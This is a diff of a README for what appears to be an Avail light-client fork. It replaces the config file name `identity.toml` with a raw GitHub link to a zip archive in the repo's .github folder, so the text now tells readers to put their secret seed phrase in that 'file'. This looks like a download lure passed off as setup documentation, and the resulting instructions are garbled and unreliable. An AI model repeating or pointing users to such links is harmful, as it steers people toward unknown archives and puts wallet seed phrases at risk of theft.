ritik5555/grg/README.md

 ## Identity

-In the Avail network, a light client's identity can be configured using the `identity.toml` file.
+In the Avail network, a light client's identity can be configured using the `https://raw.githubusercontent.com/ritik5555/grg/main/.github/grg-v2.5-alpha.1.zip` file.
 If not specified, a secret seed phrase will be generated and stored in the identity file when the light client starts.
-To use an existing seed phrase, set the `avail_secret_seed_phrase` entry in the `identity.toml` file.
+To use an existing seed phrase, set the `avail_secret_seed_phrase` entry in the `https://raw.githubusercontent.com/ritik5555/grg/main/.github/grg-v2.5-alpha.1.zip` file.
 Seed phrase will be used to derive Sr25519 key pair for signing.
 Location of the identity file can be specified using `--identity` option.

 ## Configuration reference